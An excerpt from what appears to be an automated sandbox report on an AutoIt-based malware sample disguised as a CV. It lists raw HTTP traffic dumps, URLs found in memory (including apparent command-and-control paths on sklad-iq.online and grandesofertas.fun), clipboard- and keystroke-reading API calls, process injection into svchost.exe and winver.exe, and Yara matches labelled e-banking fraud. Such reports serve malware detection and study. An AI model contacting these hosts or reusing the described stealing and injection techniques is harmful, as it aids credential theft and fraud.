92 4a 52 5c c1 44 c9 37 c9 51 f2 28 39 48 1e b3 e4 bb 64 3f fd 08 1f ef 25 87 e9 c7 e9 0d 7c 3e c4 ef 51 72 37 d9 a7 c7 77 d7 fc 6e 1c 6e 34 11 8c 3a 6c bb 06 a1 36 c7 ea 50 ca 30 be 60 59 88 3d 13 d1 ab 83 c1 0f fa 81 eb 06 13 e6 07 41 28 80 12 7c 40 1c 00 2d 22 02 9e 79 34 a0 98 ee 74 11 f4 23 28 f3 57 9a dd 4c 3f 4a 6f 36 2d de 6e 5a 58 47 bb b9 b0 98 81 e8 74 b2 40 37 26 11 0f 43 08 cd 0c bc d8 de 51 b1 d8 41 2c 80 15 56 76 52 6e 19 06 b1 04 87 18 b1 e4 d2 b1 e1 80 85 59 e7 6c 6d 64 f3 93 9f d6 67 d6 58 f0 88 a1 a8 a1 b2 9c 36 86 eb ed 66 b8 7a 68 4f 68 10 23 52 9f dd 55 cd 6e d4 4e 0e b5 b7 92 1f c8 8d c9 0f ca b5 0f 8e 39 73 ce e2 e1 aa 55 77 c7 52 06 7e 9c 9b 1b cb 2e 61 40 3f 84 96 fa 03 7c e0 06 51 47 39 59 f8 36 21 2d 7b 10 3b 57 45 07 ee f7 b8 ab 7c 91 99 b4 18 5f 98 2f eb af fc 02 46 2e 89 08 79 af 07 2f 75 5c 02 ce 22 f0 88 9e 35 f8 ac c9 30 70 62 6b d3 1e 0a 7b d4 5a eb a9 34 b1 84 bd d7 b8 17 6e 60 48 27 0e c6 91 2d 5a b9 06 c4 cb 95 f6 6f 48 08 e1 90 95 97 4b 61 53 56 5f 11 77 29 1a 4f 5e 4e 2f f0 b8 53 d0 7b 1e 32 25 cd 75 07 cb 17 13 6b 73 2c bd 5c b3 65 ca d3 63 4a 30 63 2f 57 7c 8d 9a 6c 2c 8a 3b 03 bf 15 c3 4c 7e af 03 51 27 af 33 f9 3b 60 f1 9f e4 80 a5 9f 26 47 e9 67 e9 4d 96 dc cf 49 e1 74 29 0e e3 90 fb 4b 10 1b 46 81 17 18 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:13:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 4d e2 f4 53 1e 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ca ee 50 34 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d a7 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a bb a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca 7b 97 7e 69 9c c3 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 df 73 d7 11 93 30 88 64 a9 eb c4 e9 c9 61 ab 27 76 1d 5b 18 ea 4b c3 f1 1d e9 70 d7 88 6d ee 8a d6 3a 44 48 47 ba a2 3d 99 4c cc 78 e4 f2 9e e1 7c 68 06 be eb f8 a2 69 e9 47 4d 7c 19 b1 48 b8 ad 4a 2c a7 ae 88 87 42 60 16 4f f4 1c de aa 70 d7 ad b0 61 24 fa 85 ae 4a 37 83 8f 65 60 da 71 8c 19 66 e3 1d ac 22 ef dd e7 50 2b f0 4d fc d9 5c af 30 32 1f ac e5 f1 81 b0 ae 18 aa 63 bb 19 db 91 13 ca b6 75 a6 79 7a fb 8d 8b af 5d 7a 6d fb 8c 75 6a e2 f8 bd 60 62 ca 88 db a3 2d d5 e1 ad 80 f7 58 8b f5 c7 be 2d 9d c0 af d5 af ed 6d 9c b2 ce ec ec b4 cf 58 4d 2b 13 92 09 63 58 1c ba b7 2a cb c5 d4 aa 96 c7 7d a7 2f 62 69 5e 8e ab f5 0a fa 8b 28 0a a2 a7 1c d0 60 eb 18 13 47 76 ab 52 16 04 a7 e4 4e 1e cb be 72 f2 33 eb 45 88 81 df c8 22 f1 53 eb b6 38 a8 ac df c2 b3 93 74 b4 34 5c bb 41 6f 9a 03 bb 6b 84 f0 15 d3 ff 3a e4 be 4e 06 56 d5 a6 60 3b fb d4 e9 0e 3a ae 33 18 4a e0 81 64 89 a8 2c 47 75 ee 74 b2 07 24 72 ae 45 4b cf 20 df 73 76 57 0e 35 fc 40 92 4a 52 5c c1 44 c9 37 c9 51 f2 28 39 48 1e b3 e4 bb 64 3f fd 08 1f ef 25 87 e9 c7 e9 0d 7c 3e c4 ef 51 72 37 d9 a7 c7 77 d7 fc 6e 1c 6e 34 11 8c 3a 6c bb 06 a1 36 c7 ea 50 ca 30 be 60 59 88 3d 13 d1 ab 83 c1 0f fa 81 eb 06 13 e6 07 41 28 80 12 7c 40 1c 00 2d 22 02 9e 79 34 a0 98 ee 74 11 f4 23 28 f3 57 9a dd 4c 3f 4a 6f 36 2d de 6e 5a 58 47 bb b9 b0 98 81 e8 74 b2 40 37 26 11 0f 43 08 cd 0c bc d8 de 51 b1 d8 41 2c 80 15 56 76 52 6e 19 06 b1 04 87 18 b1 e4 d2 b1 e1 80 85 59 e7 6c 6d 64 f3 93 9f d6 67 d6 58 f0 88 a1 a8 a1 b2 9c 36 86 eb ed 66 b8 7a 68 4f 68 10 23 52 9f dd 55 cd 6e d4 4e 0e b5 b7 92 1f c8 8d c9 0f ca b5 0f 8e 39 73 ce e2 e1 aa 55 77 c7 52 06 7e 9c 9b 1b cb 2e 61 40 3f 84 96 fa 03 7c e0 06 51 47 39 59 f8 36 21 2d 7b 10 3b 57 45 07 ee f7 b8 ab 7c 91 99 b4 18 5f 98 2f eb af fc 02 46 2e 89 08 79 af 07 2f 75 5c 02 ce 22 f0 88 9e 35 f8 ac c9 30 70 62 6b d3 1e 0a 7b d4 5a eb a9 34 b1 84 bd d7 b8 17 6e 60 48 27 0e c6 91 2d 5a b9 06 c4 cb 95 f6 6f 48 08 e1 90 95 97 4b 61 53 56 5f 11 77 29 1a 4f 5e 4e 2f f0 b8 53 d0 7b 1e 32 25 cd 75 07 cb 17 13 6b 73 2c bd 5c b3 65 ca d3 63 4a 30 63 2f 57 7c 8d 9a 6c 2c 8a 3b 03 bf 15 c3 4c 7e af 03 51 27 af 33 f9 3b 60 f1 9f e4 80 a5 9f 26 47 e9 67 e9 4d 96 dc cf 49 e1 74 29 0e e3 90 fb 4b 10 1b 46 81 17 18 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:13:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 4d e2 f4 53 1e 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ca ee 50 34 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d a7 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a bb a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca 7b 97 7e 69 9c c3 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 df 73 d7 11 93 30 88 64 a9 eb c4 e9 c9 61 ab 27 76 1d 5b 18 ea 4b c3 f1 1d e9 70 d7 88 6d ee 8a d6 3a 44 48 47 ba a2 3d 99 4c cc 78 e4 f2 9e e1 7c 68 06 be eb f8 a2 69 e9 47 4d 7c 19 b1 48 b8 ad 4a 2c a7 ae 88 87 42 60 16 4f f4 1c de aa 70 d7 ad b0 61 24 fa 85 ae 4a 37 83 8f 65 60 da 71 8c 19 66 e3 1d ac 22 ef dd e7 50 2b f0 4d fc d9 5c af 30 32 1f ac e5 f1 81 b0 ae 18 aa 63 bb 19 db 91 13 ca b6 75 a6 79 7a fb 8d 8b af 5d 7a 6d fb 8c 75 6a e2 f8 bd 60 62 ca 88 db a3 2d d5 e1 ad 80 f7 58 8b f5 c7 be 2d 9d c0 af d5 af ed 6d 9c b2 ce ec ec b4 cf 58 4d 2b 13 92 09 63 58 1c ba b7 2a cb c5 d4 aa 96 c7 7d a7 2f 62 69 5e 8e ab f5 0a fa 8b 28 0a a2 a7 1c d0 60 eb 18 13 47 76 ab 52 16 04 a7 e4 4e 1e cb be 72 f2 33 eb 45 88 81 df c8 22 f1 53 eb b6 38 a8 ac df c2 b3 93 74 b4 34 5c bb 41 6f 9a 03 bb 6b 84 f0 15 d3 ff 3a e4 be 4e 06 56 d5 a6 60 3b fb d4 e9 0e 3a ae 33 18 4a e0 81 64 89 a8 2c 47 75 ee 74 b2 07 24 72 ae 45 4b cf 20 df 73 76 57 0e 35 fc 40 92 4a 52 5c c1 44 c9 37 c9 51 f2 28 39 48 1e b3 e4 bb 64 3f fd 08 1f ef 25 87 e9 c7 e9 0d 7c 3e c4 ef 51 72 37 d9 a7 c7 77 d7 fc 6e 1c 6e 34 11 8c 3a 6c bb 06 a1 36 c7 ea 50 ca 30 be 60 59 88 3d 13 d1 ab 83 c1 0f fa 81 eb 06 13 e6 07 41 28 80 12 7c 40 1c 00 2d 22 02 9e 79 34 a0 98 ee 74 11 f4 23 28 f3 57 9a dd 4c 3f 4a 6f 36 2d de 6e 5a 58 47 bb b9 b0 98 81 e8 74 b2 40 37 26 11 0f 43 08 cd 0c bc d8 de 51 b1 d8 41 2c 80 15 56 76 52 6e 19 06 b1 04 87 18 b1 e4 d2 b1 e1 80 85 59 e7 6c 6d 64 f3 93 9f d6 67 d6 58 f0 88 a1 a8 a1 b2 9c 36 86 eb ed 66 b8 7a 68 4f 68 10 23 52 9f dd 55 cd 6e d4 4e 0e b5 b7 92 1f c8 8d c9 0f ca b5 0f 8e 39 73 ce e2 e1 aa 55 77 c7 52 06 7e 9c 9b 1b cb 2e 61 40 3f 84 96 fa 03 7c e0 06 51 47 39 59 f8 36 21 2d 7b 10 3b 57 45 07 ee f7 b8 ab 7c 91 99 b4 18 5f 98 2f eb af fc 02 46 2e 89 08 79 af 07 2f 75 5c 02 ce 22 f0 88 9e 35 f8 ac c9 30 70 62 6b d3 1e 0a 7b d4 5a eb a9 34 b1 84 bd d7 b8 17 6e 60 48 27 0e c6 91 2d 5a b9 06 c4 cb 95 f6 6f 48 08 e1 90 95 97 4b 61 53 56 5f 11 77 29 1a 4f 5e 4e 2f f0 b8 53 d0 7b 1e 32 25 cd 75 07 cb 17 13 6b 73 2c bd 5c b3 65 ca d3 63 4a 30 63 2f 57 7c 8d 9a 6c 2c 8a 3b 03 bf 15 c3 4c 7e af 03 51 27 af 33 f9 3b 60 f1 9f e4 80 a5 9f 26 47 e9 67 e9 4d 96 dc cf 49 e1 74 29 0e e3 90 fb 4b 10 1b 46 81 17 18 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:13:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 34 66 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 6b 6c 61 64 2d 69 71 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b
                Source: DIRZUznVUfWlad.exe, 00000007.00000002.4145384093.0000000003E28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://narman.com/
                Source: DIRZUznVUfWlad.exe, 00000007.00000002.4147404593.0000000004F39000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sklad-iq.online
                Source: DIRZUznVUfWlad.exe, 00000007.00000002.4147404593.0000000004F39000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sklad-iq.online/gdvz/
                Source: winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: winver.exe, 00000006.00000002.4146215002.00000000064C2000.00000004.10000000.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4145384093.0000000003972000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
                Source: winver.exe, 00000006.00000002.4144237864.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: winver.exe, 00000006.00000002.4144237864.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: winver.exe, 00000006.00000002.4144237864.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: winver.exe, 00000006.00000002.4144237864.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: winver.exe, 00000006.00000002.4144237864.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: winver.exe, 00000006.00000002.4144237864.0000000003286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: winver.exe, 00000006.00000003.2220349764.0000000008035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.sklad-iq.online&rand=
                Source: winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4145384093.000000000414C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
                Source: winver.exe, 00000006.00000002.4146215002.0000000005CE8000.00000004.10000000.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4145384093.0000000003198000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bt.cn/?from=404
                Source: winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: winver.exe, 00000006.00000002.4146215002.00000000059C4000.00000004.10000000.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4145384093.0000000002E74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2341761570.000000003EA84000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.grandesofertas.fun/wu6o/?3vNdCBvX=PAJ2EBywaoPRtAOAuLkHmGqEo3O5GOPxYR74cZ8tmddFXtcUCShy8K
                Source: winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_
                Source: winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land
                Source: winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_ho
                Source: winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
                Source: winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.sklad-iq.online&amp;reg_source=parking_auto
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003D6B0C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003D6D07
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003D6B0C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_003C2B37
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003EF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_003EF7FF

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4145192791.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2031660118.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4145128691.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2036469634.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2031290785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4145164327.00000000028E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4143976665.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: This is a third-party compiled AutoIt script.0_2_00383D19
                Source: CV Lic H&S Olivetti Renzo.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_63e21c6a-c
                Source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: ;SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_fd29418b-e
                Source: CV Lic H&S Olivetti Renzo.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_182799a4-4
                Source: CV Lic H&S Olivetti Renzo.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ca040193-6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C9F3 NtClose,1_2_0042C9F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040AA5D NtResumeThread,1_2_0040AA5D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72B60 NtClose,LdrInitializeThunk,1_2_03A72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03A72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A735C0 NtCreateMutant,LdrInitializeThunk,1_2_03A735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A74340 NtSetContextThread,1_2_03A74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A74650 NtSuspendThread,1_2_03A74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72BA0 NtEnumerateValueKey,1_2_03A72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72B80 NtQueryInformationFile,1_2_03A72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72BE0 NtQueryValueKey,1_2_03A72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72BF0 NtAllocateVirtualMemory,1_2_03A72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72AB0 NtWaitForSingleObject,1_2_03A72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72AF0 NtWriteFile,1_2_03A72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72AD0 NtReadFile,1_2_03A72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72FA0 NtQuerySection,1_2_03A72FA0
